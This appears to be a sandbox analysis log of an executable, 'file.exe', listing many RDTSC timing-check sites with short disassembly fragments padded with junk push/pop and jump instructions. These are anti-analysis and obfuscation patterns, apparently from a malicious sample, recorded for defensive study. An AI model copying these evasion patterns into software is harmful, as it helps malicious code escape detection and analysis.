Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B1C2 second address: 95B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F848150386Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B1D8 second address: 95B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F8480743926h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95BA75 second address: 95BA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F848150386Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95BA90 second address: 95BA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C13E second address: 95C142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C142 second address: 95C152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074395Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95C152 second address: 95C156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 960176 second address: 96017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96017C second address: 96018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F848150386Ah 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96018F second address: 9601B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F8480743937h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9601B2 second address: 9601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96474C second address: 964750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964750 second address: 96477F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8481503889h 0x0000000c jmp 00007F8481503874h 0x00000011 jmp 00007F848150386Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96477F second address: 964789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964AA4 second address: 964AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970623 second address: 970629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 970629 second address: 97064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503878h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97064B second address: 970668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97079C second address: 9707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 jno 00007F8481503866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9734DF second address: 9734E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 973687 second address: 973696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9817CC second address: 9817E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F8480743926h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98160C second address: 981644 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F848150386Eh 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 jmp 00007F8481503873h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981644 second address: 981660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480743926h 0x00000009 jmp 00007F848074392Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986951 second address: 98695B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E464 second address: 98E46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E5D1 second address: 98E5D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E5D7 second address: 98E5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F8480743926h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E881 second address: 98E892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E892 second address: 98E8A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8480743928h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E8A0 second address: 98E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EBB4 second address: 98EBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9951E7 second address: 9951F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9951F8 second address: 995201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B203F second address: 9B2043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2043 second address: 9B2054 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnc 00007F8480743926h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2054 second address: 9B206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8481503872h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B36DE second address: 9B36E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B5437 second address: 9B543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B543B second address: 9B5447 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B5447 second address: 9B544D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B544D second address: 9B5451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B5451 second address: 9B5473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8481503878h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B5473 second address: 9B5477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE783 second address: 9CE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF00D second address: 9CF014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF014 second address: 9CF01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF156 second address: 9CF162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF43C second address: 9CF47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8481503872h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8481503870h 0x00000011 jmp 00007F848150386Ch 0x00000016 jp 00007F8481503866h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF47F second address: 9CF492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Bh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF492 second address: 9CF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF498 second address: 9CF49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D22C2 second address: 9D22C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D22C6 second address: 9D22CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D2374 second address: 9D2378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D2378 second address: 9D237C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D237C second address: 9D2385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D25BA second address: 9D25C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D25C3 second address: 9D25C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D25C7 second address: 9D261C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edx, dword ptr [ebp+12481D52h] 0x00000010 push 00000004h 0x00000012 jmp 00007F8480743937h 0x00000017 call 00007F8480743929h 0x0000001c jmp 00007F8480743934h 0x00000021 push eax 0x00000022 jo 00007F8480743949h 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F8480743926h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D261C second address: 9D2645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jns 00007F8481503866h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D28FF second address: 9D295A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8480743933h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F8480743928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1EFFh], ebx 0x0000002d push dword ptr [ebp+122D291Fh] 0x00000033 mov dword ptr [ebp+122D2099h], edi 0x00000039 call 00007F8480743929h 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D295A second address: 9D297B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F8481503872h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D297B second address: 9D297F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D297F second address: 9D29BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8481503871h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jno 00007F8481503874h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D29BB second address: 9D29BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D29BF second address: 9D29C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D29C3 second address: 9D29C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3C47 second address: 9D3C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7657 second address: 9D766C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F8480743926h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D766C second address: 9D7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0EF5 second address: 52D0EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0E6B second address: 52C0E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0E6F second address: 52C0E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0E75 second address: 52C0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503877h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0128 second address: 52A012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A012E second address: 52A016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8481503872h 0x00000015 add si, 07F8h 0x0000001a jmp 00007F848150386Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A016F second address: 52A01AC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743938h 0x00000008 adc cx, E258h 0x0000000d jmp 00007F848074392Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov si, AB0Fh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 mov bx, si 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A01AC second address: 52A01E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503876h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A01E3 second address: 52A0267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743931h 0x00000009 jmp 00007F848074392Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F8480743938h 0x00000015 add ax, 2BD8h 0x0000001a jmp 00007F848074392Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F848074392Bh 0x0000002e or ecx, 0B9EFE9Eh 0x00000034 jmp 00007F8480743939h 0x00000039 popfd 0x0000003a mov cx, 1267h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0267 second address: 52A0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503878h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0283 second address: 52A0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0287 second address: 52A029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ch, 81h 0x00000010 movsx edx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A029B second address: 52A02C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 31F62796h 0x00000014 mov dx, 2722h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B1D second address: 52C0B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8481503873h 0x00000013 and cx, 3DAEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e call 00007F8481503870h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C05C7 second address: 52C05DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743930h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C05DB second address: 52C0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F848150386Fh 0x00000012 or eax, 169E46EEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0618 second address: 52C0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0628 second address: 52C064E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8481503876h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C064E second address: 52C0654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
